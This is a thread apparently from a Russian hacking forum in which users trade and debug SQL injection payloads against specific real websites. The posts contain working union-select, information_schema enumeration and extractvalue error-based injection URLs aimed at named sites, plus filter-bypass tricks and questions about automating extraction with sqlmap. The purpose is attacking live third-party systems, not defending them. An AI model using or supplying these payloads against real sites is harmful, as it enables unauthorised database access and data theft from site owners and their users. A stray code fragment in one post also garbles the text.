 |
|
03.01.2014, 19:26
|
|
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами:
7504886
Репутация:
0
|
|
Сообщение от er9j6@
Вбиваешь в Havij, и крутишь
5.1.70-log
так неинтересно!
|
|
|
03.01.2014, 20:29
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Сообщение от Always
так неинтересно!
В пяти шагах отсюда и union есть: http://www.btlt.ru/comp/index.php?a=f&id=911 union select version(),user(),database()
|
|
|
|
03.01.2014, 20:42
|
|
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами:
7504886
Репутация:
0
|
|
Сообщение от Inoms
В пяти шагах отсюда и union есть: http://www.btlt.ru/comp/index.php?a=f&id=911 union select version(),user(),database()
но мне тот линк интересен, как его крутануть?!
|
|
|
|
04.01.2014, 18:39
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
такой вопросец,
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=ascii(substring(user( ),1,1))
не дает вывода на страницу, почуму?
ведь ascii(substring(user(),1,1)) ровняется 116
так нормальнро выводится
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=116
я как-то запрос не так составл?
|
|
|
|
04.01.2014, 18:55
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от er9j6@
так не пробовал выводить?
http://www.btlt.ru/comp/index.php?a=f&id=1+union+select+1,2,table_name+fRo M+information_schema.tables+limit+41,1+--+
меня интересует именно мой вопрос
|
|
|
|
04.01.2014, 20:06
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
С нами:
6783446
Репутация:
45
|
|
Сообщение от qaz
такой вопросец,
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=ascii(substring(user( ),1,1))
не дает вывода на страницу, почуму?
ведь ascii(substring(user(),1,1)) ровняется 116
так нормальнро выводится
http://www.btlt.ru/comp/index.php?a=p&cat=1&if=and&o=116
я как-то запрос не так составл?
Вызов функций в limit'е ? lol
|
|
|
|
05.01.2014, 00:25
|
|
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами:
6940406
Репутация:
0
|
|
Привет всем, есть инъекция вида
Сообщение от None
http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))--
Как можно автоматизировать подбор limit. И как можно узнать другие базы данных, не information_schema. |
|
|
|
05.01.2014, 02:45
|
|
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами:
6940406
Репутация:
0
|
|
Спасибо большое. Скажите ищо пожалуйста где можно по подробнее прочитать про этот тип инъекций.
Сообщение от OxoTnik
И что значит
Сообщение от None
автоматизировать подбор limit
" if author else f"
OxoTnik said:
И что значит
Сообщение от None
автоматизировать подбор limit
Нужно автоматизировать замену и парсинг limit 1,1 ; limit 2,1 ; limit 3,1 для доставания таблиц и баз автоматически.
Или можно что-то сделать с sqlmap? |
|
|
|
05.01.2014, 16:39
|
|
Новичок
Регистрация: 06.03.2013
Сообщений: 21
С нами:
6940406
Репутация:
0
|
|
Так что, мне никто не поможет
|
|
|
|
05.01.2014, 17:33
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Фильтруется table_name . Что сделать можно?
Сообщение от None
http://www.rubo.ru/%25D1%2580%25D0%25BE%25D1%2581%25D1%2581%25D0%25B8 %25D1%258F/multday.ru'or(ExtractValue(1,concat(0x3a,(select(t able_name)from(information_schema.tables)limit/**/0,1))))='1
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
